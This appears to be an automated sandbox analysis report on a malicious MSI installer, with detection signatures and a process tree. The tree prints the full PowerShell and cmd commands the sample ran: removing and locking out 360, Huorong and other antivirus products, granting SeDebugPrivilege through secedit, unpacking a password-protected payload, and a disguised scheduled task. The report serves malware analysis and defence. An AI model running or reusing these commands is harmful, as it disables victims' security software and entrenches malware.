Overview

overview

10

Static

static

1

2496afe349...44.msi

windows7-x64

10

2496afe349...44.msi

windows10-2004-x64

10

Analysis

  • max time kernel
    150s
  • max time network
    149s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240802-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
  • submitted
    05-09-2024 08:22

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    2496afe349303f5135b3e82978870b33c9fe5bea6ae494a7bcdd5ae01a0d0544.msi

  • Size

    72.6MB

  • MD5

    b93c7a9d3b8ab6939f673c8a316d7fac

  • SHA1

    2b900cc34fbc6d28cdcbc91368317b7019735027

  • SHA256

    2496afe349303f5135b3e82978870b33c9fe5bea6ae494a7bcdd5ae01a0d0544

  • SHA512

    eae37ade54e876f3c28e476a5bd88c0d3678cd73d208eec4b68ba8e1e0738e1620327c82a6d9cc6f773eed85d3dfe9ad317071b29b16821382ee8ccb32650b9c

  • SSDEEP

    1572864:WJCqQUW9zp3E8N9yBrJyyEL5OE6q4UxU12xNtkI:2WU8vynyyErxFNr

Score
10/10
defense_evasiondiscoveryevasionexecutionpersistenceprivilege_escalationtrojan

Malware Config

Signatures

  • UAC bypass 3 TTPs 3 IoCs
    evasiontrojan
  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 1 IoCs
    evasion
  • Command and Scripting Interpreter: PowerShell 1 TTPs 15 IoCs

    Run Powershell and hide display window.

    execution
  • Modifies RDP port number used by Windows 1 TTPs
  • Checks BIOS information in registry 2 TTPs 2 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Identifies Wine through registry keys 2 TTPs 1 IoCs

    Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

    evasion
  • Adds Run key to start application 2 TTPs 3 IoCs
    persistence
  • Checks whether UAC is enabled 1 TTPs 1 IoCs
    evasiontrojan
  • Enumerates connected drives 3 TTPs 46 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Indicator Removal: File Deletion 1 TTPs

    Adversaries may delete files left behind by the actions of their intrusion activity.

    defense_evasion
  • Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs
  • Drops file in Program Files directory 1 IoCs
  • Drops file in Windows directory 10 IoCs
  • Executes dropped EXE 3 IoCs
  • Hide Artifacts: Ignore Process Interrupts 1 TTPs 7 IoCs

    Command interpreters often include specific commands/flags that ignore errors and other hangups.

    defense_evasion
  • Loads dropped DLL 8 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Event Triggered Execution: Installer Packages 2 TTPs 1 IoCs
    persistenceprivilege_escalation
  • System Location Discovery: System Language Discovery 1 TTPs 29 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • Checks SCSI registry key(s) 3 TTPs 5 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

    persistenceexecution
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • System policy modification 1 TTPs 3 IoCs
    evasion
  • Uses Volume Shadow Copy service COM API

    The Volume Shadow Copy service is used to manage backups/snapshots.

    ransomware

Processes

  • C:\Windows\system32\msiexec.exe
    msiexec.exe /I C:\Users\Admin\AppData\Local\Temp\2496afe349303f5135b3e82978870b33c9fe5bea6ae494a7bcdd5ae01a0d0544.msi
    1⤵
    • Enumerates connected drives
    • Event Triggered Execution: Installer Packages
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of FindShellTrayWindow
    PID:1552
  • C:\Windows\system32\msiexec.exe
    C:\Windows\system32\msiexec.exe /V
    1⤵
    • Enumerates connected drives
    • Drops file in Program Files directory
    • Drops file in Windows directory
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:324
    • C:\Windows\system32\srtasks.exe
      C:\Windows\system32\srtasks.exe ExecuteScopeRestorePoint /WaitForRestorePoint:2
      2⤵
        PID:4668
      • C:\Windows\syswow64\MsiExec.exe
        C:\Windows\syswow64\MsiExec.exe -Embedding AB9C4FC2B3CD74688C8D03B9BBD7718D
        2⤵
        • Loads dropped DLL
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of SetWindowsHookEx
        • Suspicious use of WriteProcessMemory
        PID:4176
        • C:\Windows\SysWOW64\cmd.exe
          "C:\Windows\SysWOW64\cmd.exe" /c "fltmc.exe && exit 0||exit 1"
          3⤵
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:4928
          • C:\Windows\SysWOW64\fltMC.exe
            fltmc.exe
            4⤵
            • System Location Discovery: System Language Discovery
            PID:4316
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $ErrorActionPreference='SilentlyContinue';$360safe = Get-ChildItem -Path @('HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall', 'HKLM:\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall', 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall', 'HKCU:\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall') -ErrorAction SilentlyContinue | Get-ItemProperty -Name DisplayName, DisplayVersion, InstallLocation, UninstallString -ErrorAction SilentlyContinue | Where-Object { $_.DisplayName -like '*360°²È«ÎÀÊ¿*' } | ForEach-Object { $_.InstallLocation };if ($360safe){$360drive = [IO.Path]::GetPathRoot($360safe).TrimEnd('\');fltmc.exe detach 360Box64 $360drive;fltmc.exe detach 360FsFlt $360drive;fltmc.exe detach 360qpesv $360drive;fltmc.exe detach DsArk $360drive;Remove-Item -Path $360safe -Recurse -Force;(Get-ChildItem -Path $360safe -Recurse|Where-Object{$_ -is [IO.FileInfo]})|Rename-Item -NewName {'001_'+$_.Name} -Force;icacls.exe $360safe /deny 'Everyone:(OI)(CI)RX';Set-Content -Value 'ok' -Path 'C:\ok.ini';}
          3⤵
          • Command and Scripting Interpreter: PowerShell
          • Hide Artifacts: Ignore Process Interrupts
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:3736
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $ErrorActionPreference='SilentlyContinue';$360safe = Get-ChildItem -Path @('HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall', 'HKLM:\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall', 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall', 'HKCU:\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall') -ErrorAction SilentlyContinue | Get-ItemProperty -Name DisplayName, DisplayVersion, InstallLocation, UninstallString -ErrorAction SilentlyContinue | Where-Object { $_.DisplayName -like '*360sd*' } | ForEach-Object { $_.InstallLocation };if ($360safe){$360drive = [IO.Path]::GetPathRoot($360safe).TrimEnd('\');fltmc.exe detach 360Box64 $360drive;fltmc.exe detach 360FsFlt $360drive;fltmc.exe detach 360qpesv $360drive;fltmc.exe detach DsArk $360drive;Remove-Item -Path $360safe -Recurse -Force;(Get-ChildItem -Path $360safe -Recurse|Where-Object{$_ -is [IO.FileInfo]})|Rename-Item -NewName {'001_'+$_.Name} -Force;icacls.exe $360safe /deny 'Everyone:(OI)(CI)RX';Set-Content -Value 'ok' -Path 'C:\ok.ini';}
          3⤵
          • Command and Scripting Interpreter: PowerShell
          • Hide Artifacts: Ignore Process Interrupts
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:3340
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $ErrorActionPreference='SilentlyContinue';$huorong_path = Get-ChildItem -Path @('HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall', 'HKLM:\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall', 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall', 'HKCU:\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall') -ErrorAction SilentlyContinue | Get-ItemProperty -Name DisplayName, DisplayVersion, InstallLocation, UninstallString -ErrorAction SilentlyContinue | Where-Object { $_.DisplayName -match 'ÌÚѶµçÄԹܼÒ' } | ForEach-Object { [IO.Path]::GetDirectoryName($_.UninstallString.Replace([string][char]34,''))} };if ($huorong_path){$huorong_drive = [IO.Path]::GetPathRoot($huorong_path).TrimEnd('\');fltmc.exe detach TFsFlt $huorong_drive;Remove-Item -Path $huorong_path -Recurse -Force;(Get-ChildItem -Path $huorong_path -Recurse|Where-Object{$_ -is [IO.FileInfo]})|Rename-Item -NewName {'001_'+$_.Name} -Force;icacls.exe $huorong_path /deny 'Everyone:(OI)(CI)RX';Set-Content -Value 'ok' -Path 'C:\ok.ini';}
          3⤵
          • Command and Scripting Interpreter: PowerShell
          • Hide Artifacts: Ignore Process Interrupts
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:3348
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $ErrorActionPreference='SilentlyContinue';$huorong_path = Get-ChildItem -Path @('HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall', 'HKLM:\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall', 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall', 'HKCU:\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall') -ErrorAction SilentlyContinue | Get-ItemProperty -Name DisplayName, DisplayVersion, InstallLocation, UninstallString -ErrorAction SilentlyContinue | Where-Object { $_.DisplayName -match '»ðÈÞ' } | ForEach-Object { [IO.Path]::GetDirectoryName($_.UninstallString)} };if ($huorong_path){$huorong_drive = [IO.Path]::GetPathRoot($huorong_path).TrimEnd('\');fltmc.exe detach sysdiag $huorong_drive;Remove-Item -Path $huorong_path -Recurse -Force;(Get-ChildItem -Path $huorong_path -Recurse|Where-Object{$_ -is [IO.FileInfo]})|Rename-Item -NewName {'001_'+$_.Name} -Force;icacls.exe $huorong_path /deny 'Everyone:(OI)(CI)RX';Set-Content -Value 'ok' -Path 'C:\ok.ini';}
          3⤵
          • Command and Scripting Interpreter: PowerShell
          • Hide Artifacts: Ignore Process Interrupts
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:4460
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $ErrorActionPreference='SilentlyContinue';$huorong_path = Get-ChildItem -Path @('HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall', 'HKLM:\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall', 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall', 'HKCU:\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall') -ErrorAction SilentlyContinue | Get-ItemProperty -Name DisplayName, DisplayVersion, InstallLocation, UninstallString -ErrorAction SilentlyContinue | Where-Object { $_.DisplayName -match '½ðɽ¶¾°Ô' } | ForEach-Object { [IO.Path]::GetDirectoryName($_.UninstallString.Replace([string][char]34,''))} };if ($huorong_path){$huorong_drive = [IO.Path]::GetPathRoot($huorong_path).TrimEnd('\');fltmc.exe detach kisknl $huorong_drive;Remove-Item -Path $huorong_path -Recurse -Force;(Get-ChildItem -Path $huorong_path -Recurse|Where-Object{$_ -is [IO.FileInfo]})|Rename-Item -NewName {'001_'+$_.Name} -Force;icacls.exe $huorong_path /deny 'Everyone:(OI)(CI)RX';Set-Content -Value 'ok' -Path 'C:\ok.ini';}
          3⤵
          • Command and Scripting Interpreter: PowerShell
          • Hide Artifacts: Ignore Process Interrupts
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:436
        • C:\ProgramData\Data\un.exe
          "C:\ProgramData\Data\un.exe" x -o+ -ppoiuytrewq C:\ProgramData\Data\upx.rar iusb3mon.exe C:\ProgramData\Program\
          3⤵
          • Executes dropped EXE
          PID:2784
        • C:\ProgramData\Program\iusb3mon.exe
          "C:\ProgramData\Program\iusb3mon.exe" false
          3⤵
          • UAC bypass
          • Identifies VirtualBox via ACPI registry values (likely anti-VM)
          • Checks BIOS information in registry
          • Identifies Wine through registry keys
          • Adds Run key to start application
          • Checks whether UAC is enabled
          • Suspicious use of NtSetInformationThreadHideFromDebugger
          • Executes dropped EXE
          • System Location Discovery: System Language Discovery
          • Checks processor information in registry
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of WriteProcessMemory
          • System policy modification
          PID:3736
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            powershell.exe -NoProfile -C "Set-Content -Value @('[Unicode]','Unicode=yes','[Version]','signature=\"$CHICAGO$\"','Revision=1','[Privilege Rights]','SeDebugPrivilege = *S-1-5-18','[File Security]','\"C:\ProgramData\Program\",0,\"D:AR(D;OICI;DTSDRCWD;;;WD)\"') -Path ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.inf')) -Encoding Unicode; secedit.exe /configure /db ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.sdb')) /cfg ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.inf')) /overwrite /log ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.log')) /quiet; Remove-Item -Path ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.*')) -Force;"
            4⤵
            • Command and Scripting Interpreter: PowerShell
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of WriteProcessMemory
            PID:3508
            • C:\Windows\SysWOW64\SecEdit.exe
              "C:\Windows\system32\SecEdit.exe" /configure /db C:\Users\Admin\AppData\Local\Temp\SeDebugPrivilege1.sdb /cfg C:\Users\Admin\AppData\Local\Temp\SeDebugPrivilege1.inf /overwrite /log C:\Users\Admin\AppData\Local\Temp\SeDebugPrivilege1.log /quiet
              5⤵
              • System Location Discovery: System Language Discovery
              PID:512
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            powershell.exe -NoProfile -C "Set-Content -Value @('[Unicode]','Unicode=yes','[Version]','signature=\"$CHICAGO$\"','Revision=1','[Privilege Rights]','SeDebugPrivilege = *S-1-5-18','[File Security]','\"C:\ProgramData\Microsoft\Program\",0,\"D:AR(D;OICI;DTSDRCWD;;;WD)\"') -Path ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege2.inf')) -Encoding Unicode; secedit.exe /configure /db ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege2.sdb')) /cfg ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege2.inf')) /overwrite /log ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege2.log')) /quiet; Remove-Item -Path ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege2.*')) -Force;"
            4⤵
            • Command and Scripting Interpreter: PowerShell
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            PID:3340
            • C:\Windows\SysWOW64\SecEdit.exe
              "C:\Windows\system32\SecEdit.exe" /configure /db C:\Users\Admin\AppData\Local\Temp\SeDebugPrivilege2.sdb /cfg C:\Users\Admin\AppData\Local\Temp\SeDebugPrivilege2.inf /overwrite /log C:\Users\Admin\AppData\Local\Temp\SeDebugPrivilege2.log /quiet
              5⤵
              • System Location Discovery: System Language Discovery
              PID:2868
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            powershell.exe -NoProfile -C "Set-Content -Value @('[Unicode]','Unicode=yes','[Version]','signature=\"$CHICAGO$\"','Revision=1','[Privilege Rights]','SeDebugPrivilege = *S-1-5-18','[File Security]','\"C:\ProgramData\Data\",0,\"D:AR(D;OICI;DTSDRCWD;;;WD)\"') -Path ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege3.inf')) -Encoding Unicode; secedit.exe /configure /db ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege3.sdb')) /cfg ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege3.inf')) /overwrite /log ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege3.log')) /quiet; Remove-Item -Path ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege3.*')) -Force;"
            4⤵
            • Command and Scripting Interpreter: PowerShell
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of WriteProcessMemory
            PID:556
            • C:\Windows\SysWOW64\SecEdit.exe
              "C:\Windows\system32\SecEdit.exe" /configure /db C:\Users\Admin\AppData\Local\Temp\SeDebugPrivilege3.sdb /cfg C:\Users\Admin\AppData\Local\Temp\SeDebugPrivilege3.inf /overwrite /log C:\Users\Admin\AppData\Local\Temp\SeDebugPrivilege3.log /quiet
              5⤵
              • System Location Discovery: System Language Discovery
              PID:4488
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            powershell.exe -NoProfile -C "[IO.File]::WriteAllBytes([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege4.inf'), [Convert]::FromBase64String('//5bAFUAbgBpAGMAbwBkAGUAXQANAAoAVQBuAGkAYwBvAGQAZQA9AHkAZQBzAA0ACgBbAFYAZQByAHMAaQBvAG4AXQANAAoAcwBpAGcAbgBhAHQAdQByAGUAPQAiACQAQwBIAEkAQwBBAEcATwAkACIADQAKAFIAZQB2AGkAcwBpAG8AbgA9ADEADQAKAFsAUAByAGkAdgBpAGwAZQBnAGUAIABSAGkAZwBoAHQAcwBdAA0ACgBTAGUARABlAGIAdQBnAFAAcgBpAHYAaQBsAGUAZwBlACAAPQAgACoAUwAtADEALQA1AC0AMQA4AA0ACgA=')); secedit.exe /configure /db ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege4.sdb')) /cfg ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege4.inf')) /overwrite /log ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege4.log')) /quiet; Remove-Item -Path ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege4.*')) -Force;"
            4⤵
            • Command and Scripting Interpreter: PowerShell
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of WriteProcessMemory
            PID:4916
            • C:\Windows\SysWOW64\SecEdit.exe
              "C:\Windows\system32\SecEdit.exe" /configure /db C:\Users\Admin\AppData\Local\Temp\SeDebugPrivilege4.sdb /cfg C:\Users\Admin\AppData\Local\Temp\SeDebugPrivilege4.inf /overwrite /log C:\Users\Admin\AppData\Local\Temp\SeDebugPrivilege4.log /quiet
              5⤵
              • System Location Discovery: System Language Discovery
              PID:3840
          • C:\Windows\SysWOW64\cmd.exe
            cmd /c echo.>c:\inst.ini
            4⤵
            • System Location Discovery: System Language Discovery
            PID:4184
          • C:\Windows\SysWOW64\cmd.exe
            cmd /c echo.>c:\inst.ini
            4⤵
            • System Location Discovery: System Language Discovery
            PID:736
          • C:\Windows\SysWOW64\cmd.exe
            cmd /c echo.>c:\inst.ini
            4⤵
            • System Location Discovery: System Language Discovery
            PID:3452
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass $ErrorActionPreference='SilentlyContinue';$360safe = Get-ChildItem -Path @('HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall', 'HKLM:\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall', 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall', 'HKCU:\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall') -ErrorAction SilentlyContinue | Get-ItemProperty -Name DisplayName, DisplayVersion, InstallLocation, UninstallString -ErrorAction SilentlyContinue | Where-Object { $_.DisplayName -like '*360°²È«ÎÀÊ¿*' } | ForEach-Object { $_.InstallLocation };if ($360safe){$360drive = [IO.Path]::GetPathRoot($360safe).TrimEnd('\');fltmc.exe detach 360Box64 $360drive;fltmc.exe detach 360FsFlt $360drive;fltmc.exe detach 360qpesv $360drive;fltmc.exe detach DsArk $360drive;Remove-Item -Path $360safe -Recurse -Force;(Get-ChildItem -Path $360safe -Recurse|Where-Object{$_ -is [IO.FileInfo]})|Rename-Item -NewName {'001_'+$_.Name} -Force;icacls.exe $360safe /deny 'Everyone:(OI)(CI)RX';Set-Content -Value 'ok' -Path 'C:\360safe.ini';}
            4⤵
            • Command and Scripting Interpreter: PowerShell
            • System Location Discovery: System Language Discovery
            PID:5352
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass $ErrorActionPreference='SilentlyContinue';$360safe = Get-ChildItem -Path @('HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall', 'HKLM:\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall', 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall', 'HKCU:\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall') -ErrorAction SilentlyContinue | Get-ItemProperty -Name DisplayName, DisplayVersion, InstallLocation, UninstallString -ErrorAction SilentlyContinue | Where-Object { $_.DisplayName -like '*360sd*' } | ForEach-Object { $_.InstallLocation };if ($360safe){$360drive = [IO.Path]::GetPathRoot($360safe).TrimEnd('\');fltmc.exe detach 360Box64 $360drive;fltmc.exe detach 360FsFlt $360drive;fltmc.exe detach 360qpesv $360drive;fltmc.exe detach DsArk $360drive;Remove-Item -Path $360safe -Recurse -Force;(Get-ChildItem -Path $360safe -Recurse|Where-Object{$_ -is [IO.FileInfo]})|Rename-Item -NewName {'001_'+$_.Name} -Force;icacls.exe $360safe /deny 'Everyone:(OI)(CI)RX';Set-Content -Value 'ok' -Path 'C:\360sd.ini';}
            4⤵
            • Command and Scripting Interpreter: PowerShell
            • System Location Discovery: System Language Discovery
            PID:5360
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            powershell.exe -ExecutionPolicy Bypass $ErrorActionPreference='SilentlyContinue';$huorong_path = Get-ChildItem -Path @('HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall', 'HKLM:\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall', 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall', 'HKCU:\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall') -ErrorAction SilentlyContinue | Get-ItemProperty -Name DisplayName, DisplayVersion, InstallLocation, UninstallString -ErrorAction SilentlyContinue | Where-Object { $_.DisplayName -match '»ðÈÞ' } | ForEach-Object { [IO.Path]::GetDirectoryName($_.UninstallString)} };if ($huorong_path){$huorong_drive = [IO.Path]::GetPathRoot($huorong_path).TrimEnd('\');fltmc.exe detach sysdiag $huorong_drive;Remove-Item -Path $huorong_path -Recurse -Force;(Get-ChildItem -Path $huorong_path -Recurse|Where-Object{$_ -is [IO.FileInfo]})|Rename-Item -NewName {'001_'+$_.Name} -Force;icacls.exe $huorong_path /deny 'Everyone:(OI)(CI)RX';Set-Content -Value 'ok' -Path 'C:\ok.ini';}
            4⤵
            • Command and Scripting Interpreter: PowerShell
            • Hide Artifacts: Ignore Process Interrupts
            • System Location Discovery: System Language Discovery
            PID:5368
          • C:\Windows\SysWOW64\cmd.exe
            cmd.exe /c schtasks.exe /create /tn "Windows Audio Endpoint Builder(ϵͳÒôƵ·þÎñ)" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
            4⤵
            • System Location Discovery: System Language Discovery
            PID:6140
            • C:\Windows\SysWOW64\schtasks.exe
              schtasks.exe /create /tn "Windows Audio Endpoint Builder(ϵͳÒôƵ·þÎñ)" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
              5⤵
              • System Location Discovery: System Language Discovery
              • Scheduled Task/Job: Scheduled Task
              PID:4464
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass $ErrorActionPreference='SilentlyContinue';$360safe = Get-ChildItem -Path @('HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall', 'HKLM:\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall', 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall', 'HKCU:\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall') -ErrorAction SilentlyContinue | Get-ItemProperty -Name DisplayName, DisplayVersion, InstallLocation, UninstallString -ErrorAction SilentlyContinue | Where-Object { $_.DisplayName -like '*360°²È«ÎÀÊ¿*' } | ForEach-Object { $_.InstallLocation };if ($360safe){$360drive = [IO.Path]::GetPathRoot($360safe).TrimEnd('\');fltmc.exe detach 360Box64 $360drive;fltmc.exe detach 360FsFlt $360drive;fltmc.exe detach 360qpesv $360drive;fltmc.exe detach DsArk $360drive;Remove-Item -Path $360safe -Recurse -Force;(Get-ChildItem -Path $360safe -Recurse|Where-Object{$_ -is [IO.FileInfo]})|Rename-Item -NewName {'001_'+$_.Name} -Force;icacls.exe $360safe /deny 'Everyone:(OI)(CI)RX';Set-Content -Value 'ok' -Path 'C:\360safe.ini';}
            4⤵
            • Command and Scripting Interpreter: PowerShell
            • System Location Discovery: System Language Discovery
            PID:3380
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass $ErrorActionPreference='SilentlyContinue';$360safe = Get-ChildItem -Path @('HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall', 'HKLM:\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall', 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall', 'HKCU:\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall') -ErrorAction SilentlyContinue | Get-ItemProperty -Name DisplayName, DisplayVersion, InstallLocation, UninstallString -ErrorAction SilentlyContinue | Where-Object { $_.DisplayName -like '*360sd*' } | ForEach-Object { $_.InstallLocation };if ($360safe){$360drive = [IO.Path]::GetPathRoot($360safe).TrimEnd('\');fltmc.exe detach 360Box64 $360drive;fltmc.exe detach 360FsFlt $360drive;fltmc.exe detach 360qpesv $360drive;fltmc.exe detach DsArk $360drive;Remove-Item -Path $360safe -Recurse -Force;(Get-ChildItem -Path $360safe -Recurse|Where-Object{$_ -is [IO.FileInfo]})|Rename-Item -NewName {'001_'+$_.Name} -Force;icacls.exe $360safe /deny 'Everyone:(OI)(CI)RX';Set-Content -Value 'ok' -Path 'C:\360sd.ini';}
            4⤵
            • Command and Scripting Interpreter: PowerShell
            • System Location Discovery: System Language Discovery
            PID:5128
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            powershell.exe -ExecutionPolicy Bypass $ErrorActionPreference='SilentlyContinue';$huorong_path = Get-ChildItem -Path @('HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall', 'HKLM:\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall', 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall', 'HKCU:\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall') -ErrorAction SilentlyContinue | Get-ItemProperty -Name DisplayName, DisplayVersion, InstallLocation, UninstallString -ErrorAction SilentlyContinue | Where-Object { $_.DisplayName -match '»ðÈÞ' } | ForEach-Object { [IO.Path]::GetDirectoryName($_.UninstallString)} };if ($huorong_path){$huorong_drive = [IO.Path]::GetPathRoot($huorong_path).TrimEnd('\');fltmc.exe detach sysdiag $huorong_drive;Remove-Item -Path $huorong_path -Recurse -Force;(Get-ChildItem -Path $huorong_path -Recurse|Where-Object{$_ -is [IO.FileInfo]})|Rename-Item -NewName {'001_'+$_.Name} -Force;icacls.exe $huorong_path /deny 'Everyone:(OI)(CI)RX';Set-Content -Value 'ok' -Path 'C:\ok.ini';}
            4⤵
            • Command and Scripting Interpreter: PowerShell
            • Hide Artifacts: Ignore Process Interrupts
            • System Location Discovery: System Language Discovery
            PID:5132
      • C:\Program Files (x86)\My Product\LineInst.exe
        "C:\Program Files (x86)\My Product\LineInst.exe"
        2⤵
        • Executes dropped EXE
        • Loads dropped DLL
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        PID:3624
